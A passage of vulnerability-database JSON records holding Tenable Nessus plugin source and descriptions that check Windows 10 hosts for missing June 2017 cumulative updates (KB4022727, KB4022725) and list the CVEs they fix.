to execute arbitrary code. (CVE-2017-8543)\n\n - An information disclosure vulnerability exists in the\n Windows Search functionality due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, via a specially crafted SMB message,\n to disclose sensitive information. (CVE-2017-8544)\n\n - A remote code execution vulnerability exists in Internet\n Explorer due to improper handling of objects in memory.\n An unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8547)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the JavaScript scripting engine due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8549)\n\n - An information disclosure vulnerability exists in the\n Windows Graphics component due to improper handling of\n objects in memory. An authenticated, remote attacker can\n exploit this, via a specially crafted application, to\n disclose sensitive information. (CVE-2017-8575)\n\n - An elevation of privilege vulnerability exists in the\n Windows Graphics component due to improper\n initialization of objects in memory. A local attacker\n can exploit this, via a specially crafted application,\n to execute arbitrary code in kernel mode.\n (CVE-2017-8576)\n\n - An elevation of privilege vulnerability exists DirectX\n due to improper handling of objects in memory. A local\n attacker can exploit this, via a specially crafted\n application, to execute arbitrary code in kernel mode.\n (CVE-2017-8576)\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper handling of objects in\n memory. An authenticated, remote attacker can exploit\n this, via a specially crafted application, to disclose\n the contents of memory. (CVE-2017-8554)\");\n # https://support.microsoft.com/en-us/help/4022727/windows-10-update-kb4022727\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?05d092f6\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply security update KB4022727 as well as refer to the KB article for additional information.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-8543\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'LNK Code Execution Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/06/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/06/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/06/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_reg_query.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS17-06';\nkbs = make_list(\n '4022727' # 10 1507\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"2016\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nif (\n # 10 (1507)\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"10240\",\n rollup_date: \"06_2017\",\n bulletin:bulletin,\n rollup_kb_list:kbs)\n )\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:29:34", "description": "The remote Windows 10 version 1703 host is missing security update KB4022725. It is, therefore, affected by multiple vulnerabilities :\n\n - Multiple information disclosure vulnerabilities exist in Windows Uniscribe due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit these, by convincing a user to visit a specially crafted website or to open a specially crafted document, to disclose the contents of memory. (CVE-2017-0282, CVE-2017-0285)\n\n - A remote code execution vulnerability exists in Windows Uniscribe software due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or to open a specially crafted document, to execute arbitrary code in the context of the current user. (CVE-2017-0283)\n\n - Multiple information disclosure vulnerabilities exist in the Windows GDI component due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit these, by convincing a user to visit a specially crafted website or open a specially crafted document, to disclose the contents of memory.\n (CVE-2017-0287, CVE-2017-0288, CVE-2017-0289, CVE-2017-8531, CVE-2017-8532, CVE-2017-8533)\n\n - Multiple remote code execution vulnerabilities exist in Microsoft Windows due to improper parsing of PDF files.\n An unauthenticated, remote attacker can exploit these, by convincing a user to open a specially crafted PDF file, to execute arbitrary code in the context of the current user. (CVE-2017-0291, CVE-2017-0292)\n\n - A remote code execution vulnerability exists in Microsoft Windows due to improper handling of cabinet files. An unauthenticated, remote attacker can exploit this, by convincing a user to open a specially crafted cabinet file, to execute arbitrary code in the context of the current user. (CVE-2017-0294)\n\n - A flaw exists in Microsoft Windows due to incorrect permissions being set on folders inside the DEFAULT folder structure. An authenticated, remote attacker can exploit this, by logging in to the affected system before the user can log in, to modify the user's DEFAULT folder contents. (CVE-2017-0295)\n\n - An elevation of privilege vulnerability exists in tdx.sys due to a failure to check the length of a buffer prior to copying memory to it. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code in an elevated context.\n (CVE-2017-0296)\n\n - An elevation of privilege vulnerability exists in the Windows kernel due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code with elevated permissions. (CVE-2017-0297)\n\n - An elevation of privilege vulnerability exists in the DCOM object in Helppane.exe, when configured to run as the interactive user, due to a failure to properly authenticate the client. An authenticated, remote attacker can exploit this, via a specially crafted application, to run arbitrary code in another user's session after that user has logged on to the same system using Terminal Services or Fast User Switching.\n (CVE-2017-0298)\n\n - Multiple information disclosure vulnerabilities exist in the Windows kernel due to improper initialization of objects in memory. An authenticated, remote attacker can exploit these, via a specially crafted application, to disclose the base address of the kernel driver.\n (CVE-2017-0299, CVE-2017-0300, CVE-2017-8462, CVE-2017-8485)\n\n - An information disclosure vulnerability exists in Microsoft Windows due to improper parsing of PDF files.\n An unauthenticated, remote attacker can exploit this, by convincing a user to open a specially crafted PDF file, to disclose the contents of memory. (CVE-2017-8460)\n\n - A remote code execution vulnerability exists in Windows due to improper handling of shortcuts. An unauthenticated, remote attacker can exploit this, by convincing a user to insert a removable drive containing a malicious shortcut and binary, to automatically execute arbitrary code in the context of the current user. (CVE-2017-8464)\n\n - An elevation of privilege vulnerability exists in the Windows kernel-mode driver due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to run processes in an elevated context. (CVE-2017-8465)\n\n - Multiple information disclosure vulnerabilities exist in the Windows kernel due to improper initialization of objects in memory. An authenticated, remote attacker can exploit these, via a specially crafted application, to disclose sensitive information. (CVE-2017-8470, CVE-2017-8471, CVE-2017-8474, CVE-2017-8475, CVE-2017-8476, CVE-2017-8477, CVE-2017-8478, CVE-2017-8479, CVE-2017-8480, CVE-2017-8481, CVE-2017-8482, CVE-2017-8483, CVE-2017-8484, CVE-2017-8489, CVE-2017-8490, CVE-2017-8491, CVE-2017-8492)\n\n - A security bypass vulnerability exists due to a failure to enforce case sensitivity for certain variable checks.\n A local attacker can exploit this, via a specially crafted application, to bypass Unified Extensible Firmware Interface (UEFI) variable security.\n (CVE-2017-8493)\n\n - An information disclosure vulnerability exists in Microsoft Edge due to improper handling of JavaScript XML DOM objects. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to disclose sensitive information.\n (CVE-2017-8498)\n\n - A remote code execution vulnerability exists in Microsoft Edge in the JavaScript scripting engine due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Microsoft Office document, to execute arbitrary code in the context of the current user. (CVE-2017-8499)\n\n - An information disclosure vulnerability exists in Microsoft Edge in the Fetch API due to improper handling of filtered response types. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to disclose sensitive information in the URL of a cross-origin request.\n (CVE-2017-8504)\n\n - A denial of service vulnerability exists in Windows due to improper handling of kernel mode requests. An unauthenticated, remote attacker can exploit this, via a specially crafted kernel mode request, to cause the machine to stop responding or rebooting. (CVE-2017-8515)\n\n - Multiple remote code execution vulnerabilities exist in Microsoft browsers in the JavaScript engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit these, by convincing a user to visit a specially crafted website, to execute arbitrary code in the context of the current user. (CVE-2017-8517, CVE-2017-8522, CVE-2017-8524, CVE-2017-8548)\n\n - Multiple remote code execution vulnerabilities exist in Microsoft Edge in the JavaScript scripting engine due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit these, by convincing a user to visit a specially crafted website, to execute arbitrary code in the context of the current user. (CVE-2017-8520, CVE-2017-8521, CVE-2017-8549)\n\n - A same-origin policy bypass vulnerability exists in Microsoft Edge due to a failure to properly apply the Same Origin Policy for HTML elements. An unauthenticated, remote attacker can exploit this, by convincing a user to follow a link, to load a page with malicious content. (CVE-2017-8523)\n\n - A remote code execution vulnerability exists in the Windows font library due to improper handling of embedded fonts. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Microsoft document, to execute arbitrary code in the context of the current user. (CVE-2017-8527)\n\n - A same-origin policy bypass vulnerability exists in Microsoft Edge due to a failure to properly enforce same-origin policies. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to disclose information from origins outside the current one. (CVE-2017-8530)\n\n - A remote code execution vulnerability exists in the Windows Search functionality due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, via a specially crafted SMB message, to execute arbitrary code. (CVE-2017-8543)\n\n - An information disclosure vulnerability exists in the Windows Search functionality due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, via a specially crafted SMB message, to disclose sensitive information. (CVE-2017-8544)\n\n - A remote code execution vulnerability exists in Internet Explorer due to improper handling of objects in memory.\n An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to execute arbitrary code in the context of the current user. (CVE-2017-8547)\n\n - A security bypass vulnerability exists in Microsoft Edge in the Content Security Policy (CSP) due to improper validation of documents. An unauthenticated, remote attacker can exploit this, by convincing a user to follow a link, to cause the user to load a malicious website. (CVE-2017-8555)\n\n - An information disclosure vulnerability exists in the Windows Graphics component due to improper handling of objects in memory. An authenticated, remote attacker can exploit this, via a specially crafted application, to disclose sensitive information. (CVE-2017-8575)\n\n - An elevation of privilege vulnerability exists in the Windows Graphics component due to improper initialization of objects in memory. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code in kernel mode.\n (CVE-2017-8576)\n\n - An elevation of privilege vulnerability exists DirectX due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code in kernel mode.\n (CVE-2017-8576)\n\n - An information disclosure vulnerability exists in the Windows kernel due to improper handling of objects in memory. An authenticated, remote attacker can exploit this, via a specially crafted application, to disclose the contents of memory. (CVE-2017-8554)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-06-13T00:00:00", "type": "nessus", "title": "KB4022725: Windows 10 Version 1703 June 2017 Cumulative Update", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0282", "CVE-2017-0283", "CVE-2017-0285", "CVE-2017-0287", "CVE-2017-0288", "CVE-2017-0289", "CVE-2017-0291", "CVE-2017-0292", "CVE-2017-0294", "CVE-2017-0295", "CVE-2017-0296", "CVE-2017-0297", "CVE-2017-0298", "CVE-2017-0299", "CVE-2017-0300", "CVE-2017-8460", "CVE-2017-8462", "CVE-2017-8464", "CVE-2017-8465", "CVE-2017-8470", "CVE-2017-8471", "CVE-2017-8474", "CVE-2017-8475", "CVE-2017-8476", "CVE-2017-8477", "CVE-2017-8478", "CVE-2017-8479", "CVE-2017-8480", "CVE-2017-8481", "CVE-2017-8482", "CVE-2017-8483", "CVE-2017-8484", "CVE-2017-8485", "CVE-2017-8489", "CVE-2017-8490", "CVE-2017-8491", "CVE-2017-8492", "CVE-2017-8493", "CVE-2017-8498", "CVE-2017-8499", "CVE-2017-8504", "CVE-2017-8515", "CVE-2017-8517", "CVE-2017-8518", "CVE-2017-8520", "CVE-2017-8521", "CVE-2017-8522", "CVE-2017-8523", "CVE-2017-8524", "CVE-2017-8527", "CVE-2017-8530", "CVE-2017-8531", "CVE-2017-8532", "CVE-2017-8533", "CVE-2017-8543", "CVE-2017-8544", "CVE-2017-8547", "CVE-2017-8548", "CVE-2017-8549", "CVE-2017-8554", "CVE-2017-8555", "CVE-2017-8575", "CVE-2017-8576", "CVE-2017-8579"], "modified": "2022-05-25T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS17_JUN_4022725.NASL", "href": "https://www.tenable.com/plugins/nessus/100763", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100763);\n script_version(\"1.27\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/25\");\n\n script_cve_id(\n \"CVE-2017-0282\",\n \"CVE-2017-0283\",\n \"CVE-2017-0285\",\n \"CVE-2017-0287\",\n \"CVE-2017-0288\",\n \"CVE-2017-0289\",\n \"CVE-2017-0291\",\n \"CVE-2017-0292\",\n \"CVE-2017-0294\",\n \"CVE-2017-0295\",\n \"CVE-2017-0296\",\n \"CVE-2017-0297\",\n \"CVE-2017-0298\",\n \"CVE-2017-0299\",\n \"CVE-2017-0300\",\n \"CVE-2017-8460\",\n \"CVE-2017-8462\",\n \"CVE-2017-8464\",\n \"CVE-2017-8465\",\n \"CVE-2017-8470\",\n \"CVE-2017-8471\",\n \"CVE-2017-8474\",\n \"CVE-2017-8475\",\n \"CVE-2017-8476\",\n \"CVE-2017-8477\",\n \"CVE-2017-8478\",\n \"CVE-2017-8479\",\n \"CVE-2017-8480\",\n \"CVE-2017-8481\",\n \"CVE-2017-8482\",\n \"CVE-2017-8483\",\n \"CVE-2017-8484\",\n \"CVE-2017-8485\",\n \"CVE-2017-8489\",\n \"CVE-2017-8490\",\n \"CVE-2017-8491\",\n \"CVE-2017-8492\",\n \"CVE-2017-8493\",\n \"CVE-2017-8498\",\n \"CVE-2017-8499\",\n \"CVE-2017-8504\",\n \"CVE-2017-8515\",\n \"CVE-2017-8517\",\n \"CVE-2017-8518\",\n \"CVE-2017-8520\",\n \"CVE-2017-8521\",\n \"CVE-2017-8522\",\n \"CVE-2017-8523\",\n \"CVE-2017-8524\",\n \"CVE-2017-8527\",\n \"CVE-2017-8530\",\n \"CVE-2017-8531\",\n \"CVE-2017-8532\",\n \"CVE-2017-8533\",\n \"CVE-2017-8543\",\n \"CVE-2017-8544\",\n \"CVE-2017-8547\",\n \"CVE-2017-8548\",\n \"CVE-2017-8549\",\n \"CVE-2017-8554\",\n \"CVE-2017-8555\",\n \"CVE-2017-8575\",\n \"CVE-2017-8576\",\n \"CVE-2017-8579\"\n );\n script_bugtraq_id(\n 98818,\n 98819,\n 98820,\n 98821,\n 98824,\n 98826,\n 98833,\n 98835,\n 98836,\n 98837,\n 98839,\n 98840,\n 98843,\n 98845,\n 98847,\n 98848,\n 98849,\n 98850,\n 98853,\n 98854,\n 98856,\n 98857,\n 98858,\n 98859,\n 98860,\n 98862,\n 98863,\n 98865,\n 98867,\n 98869,\n 98870,\n 98883,\n 98884,\n 98885,\n 98886,\n 98887,\n 98892,\n 98895,\n 98900,\n 98901,\n 98902,\n 98903,\n 98904,\n 98914,\n 98920,\n 98922,\n 98923,\n 98925,\n 98926,\n 98928,\n 98929,\n 98930,\n 98932,\n 98933,\n 98942,\n 98954,\n 98955,\n 98956,\n 99210,\n 99212,\n 99215\n );\n script_xref(name:\"MSKB\", value:\"4022725\");\n script_xref(name:\"MSFT\", value:\"MS17-4022725\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/10\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/14\");\n\n script_name(english:\"KB4022725: Windows 10 Version 1703 June 2017 Cumulative Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows 10 version 1703 host is missing security update\nKB4022725. It is, therefore, affected by multiple vulnerabilities :\n\n - Multiple information disclosure vulnerabilities exist in\n Windows Uniscribe due to improper handling of objects in\n memory. An unauthenticated, remote attacker can exploit\n these, by convincing a user to visit a specially crafted\n website or to open a specially crafted document, to\n disclose the contents of memory. (CVE-2017-0282,\n CVE-2017-0285)\n\n - A remote code execution vulnerability exists in\n Windows Uniscribe software due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by convincing a user to visit a\n specially crafted website or to open a specially crafted\n document, to execute arbitrary code in the context\n of the current user. (CVE-2017-0283)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows GDI component due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit these, by convincing a user to visit a\n specially crafted website or open a specially crafted\n document, to disclose the contents of memory.\n (CVE-2017-0287, CVE-2017-0288, CVE-2017-0289,\n CVE-2017-8531, CVE-2017-8532, CVE-2017-8533)\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft Windows due to improper parsing of PDF files.\n An unauthenticated, remote attacker can exploit these,\n by convincing a user to open a specially crafted PDF\n file, to execute arbitrary code in the context of the\n current user. (CVE-2017-0291, CVE-2017-0292)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows due to improper handling of cabinet\n files. An unauthenticated, remote attacker can exploit\n this, by convincing a user to open a specially crafted\n cabinet file, to execute arbitrary code in the context\n of the current user. (CVE-2017-0294)\n\n - A flaw exists in Microsoft Windows due to incorrect\n permissions being set on folders inside the DEFAULT\n folder structure. An authenticated, remote attacker can\n exploit this, by logging in to the affected system\n before the user can log in, to modify the user's DEFAULT\n folder contents. (CVE-2017-0295)\n\n - An elevation of privilege vulnerability exists in\n tdx.sys due to a failure to check the length of a buffer\n prior to copying memory to it. A local attacker can\n exploit this, via a specially crafted application, to\n execute arbitrary code in an elevated context.\n (CVE-2017-0296)\n\n - An elevation of privilege vulnerability exists in the\n Windows kernel due to improper handling of objects in\n memory. A local attacker can exploit this, via a\n specially crafted application, to execute arbitrary code\n with elevated permissions. (CVE-2017-0297)\n\n - An elevation of privilege vulnerability exists in the\n DCOM object in Helppane.exe, when configured to run as\n the interactive user, due to a failure to properly\n authenticate the client. An authenticated, remote\n attacker can exploit this, via a specially crafted\n application, to run arbitrary code in another user's\n session after that user has logged on to the same system\n using Terminal Services or Fast User Switching.\n (CVE-2017-0298)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows kernel due to improper initialization of\n objects in memory. An authenticated, remote attacker can\n exploit these, via a specially crafted application, to\n disclose the base address of the kernel driver.\n (CVE-2017-0299, CVE-2017-0300, CVE-2017-8462,\n CVE-2017-8485)\n\n - An information disclosure vulnerability exists in\n Microsoft Windows due to improper parsing of PDF files.\n An unauthenticated, remote attacker can exploit this, by\n convincing a user to open a specially crafted PDF file,\n to disclose the contents of memory. (CVE-2017-8460)\n\n - A remote code execution vulnerability exists in Windows\n due to improper handling of shortcuts. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to insert a removable drive containing\n a malicious shortcut and binary, to automatically\n execute arbitrary code in the context of the current\n user. (CVE-2017-8464)\n\n - An elevation of privilege vulnerability exists in the\n Windows kernel-mode driver due to improper handling of\n objects in memory. A local attacker can exploit this,\n via a specially crafted application, to run processes in\n an elevated context. (CVE-2017-8465)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows kernel due to improper initialization of\n objects in memory. An authenticated, remote attacker can\n exploit these, via a specially crafted application, to\n disclose sensitive information. (CVE-2017-8470,\n CVE-2017-8471, CVE-2017-8474, CVE-2017-8475,\n CVE-2017-8476, CVE-2017-8477, CVE-2017-8478,\n CVE-2017-8479, CVE-2017-8480, CVE-2017-8481,\n CVE-2017-8482, CVE-2017-8483, CVE-2017-8484,\n CVE-2017-8489, CVE-2017-8490, CVE-2017-8491,\n CVE-2017-8492)\n\n - A security bypass vulnerability exists due to a failure\n to enforce case sensitivity for certain variable checks.\n A local attacker can exploit this, via a specially\n crafted application, to bypass Unified Extensible\n Firmware Interface (UEFI) variable security.\n (CVE-2017-8493)\n\n - An information disclosure vulnerability exists in\n Microsoft Edge due to improper handling of JavaScript\n XML DOM objects. An unauthenticated, remote attacker can\n exploit this, by convincing a user to visit a specially\n crafted website, to disclose sensitive information.\n (CVE-2017-8498)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the JavaScript scripting engine due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Microsoft Office document,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8499)\n\n - An information disclosure vulnerability exists in\n Microsoft Edge in the Fetch API due to improper handling\n of filtered response types. An unauthenticated, remote\n attacker can exploit this, by convincing a user to visit\n a specially crafted website, to disclose sensitive\n information in the URL of a cross-origin request.\n (CVE-2017-8504)\n\n - A denial of service vulnerability exists in Windows due\n to improper handling of kernel mode requests. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted kernel mode request, to cause the\n machine to stop responding or rebooting. (CVE-2017-8515)\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit these, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8517, CVE-2017-8522, CVE-2017-8524,\n CVE-2017-8548)\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft Edge in the JavaScript scripting engine due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit these, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8520, CVE-2017-8521, CVE-2017-8549)\n\n - A same-origin policy bypass vulnerability exists in\n Microsoft Edge due to a failure to properly apply the\n Same Origin Policy for HTML elements. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to follow a link, to load a page with\n malicious content. (CVE-2017-8523)\n\n - A remote code execution vulnerability exists in the\n Windows font library due to improper handling of\n embedded fonts. An unauthenticated, remote attacker can\n exploit this, by convincing a user to visit a specially\n crafted website or open a specially crafted Microsoft\n document, to execute arbitrary code in the context of\n the current user. (CVE-2017-8527)\n\n - A same-origin policy bypass vulnerability exists in\n Microsoft Edge due to a failure to properly enforce\n same-origin policies. An unauthenticated, remote\n attacker can exploit this, by convincing a user to visit\n a specially crafted website, to disclose information\n from origins outside the current one. (CVE-2017-8530)\n\n - A remote code execution vulnerability exists in the\n Windows Search functionality due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, via a specially crafted SMB message,\n to execute arbitrary code. (CVE-2017-8543)\n\n - An information disclosure vulnerability exists in the\n Windows Search functionality due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, via a specially crafted SMB message,\n to disclose sensitive information. (CVE-2017-8544)\n\n - A remote code execution vulnerability exists in Internet\n Explorer due to improper handling of objects in memory.\n An unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8547)\n\n - A security bypass vulnerability exists in Microsoft Edge\n in the Content Security Policy (CSP) due to improper\n validation of documents. An unauthenticated, remote\n attacker can exploit this, by convincing a user to\n follow a link, to cause the user to load a malicious\n website. (CVE-2017-8555)\n\n - An information disclosure vulnerability exists in the\n Windows Graphics component due to improper handling of\n objects in memory. An authenticated, remote attacker can\n exploit this, via a specially crafted application, to\n disclose sensitive information. (CVE-2017-8575)\n\n - An elevation of privilege vulnerability exists in the\n Windows Graphics component due to improper\n initialization of objects in memory. A local attacker\n can exploit this, via a specially crafted application,\n to execute arbitrary code in kernel mode.\n (CVE-2017-8576)\n\n - An elevation of privilege vulnerability exists DirectX\n due to improper handling of objects in memory. A local\n attacker can exploit this, via a specially crafted\n application, to execute arbitrary code in kernel mode.\n (CVE-2017-8576)\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper handling of objects in\n memory. An authenticated, remote attacker can exploit\n this, via a specially crafted application, to disclose\n the contents of memory. (CVE-2017-8554)\");\n # https://support.microsoft.com/en-us/help/4022725/windows-10-update-kb4022725\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c538cc09\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply security update KB4022725 as well as refer to the KB article for additional information.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-8543\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'LNK Code Execution Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/06/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/06/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/06/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\", \"smb_check_rollup.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_reg_query.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS17-06';\nkbs = make_list(\n '4022725' # 10 1703 \n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif 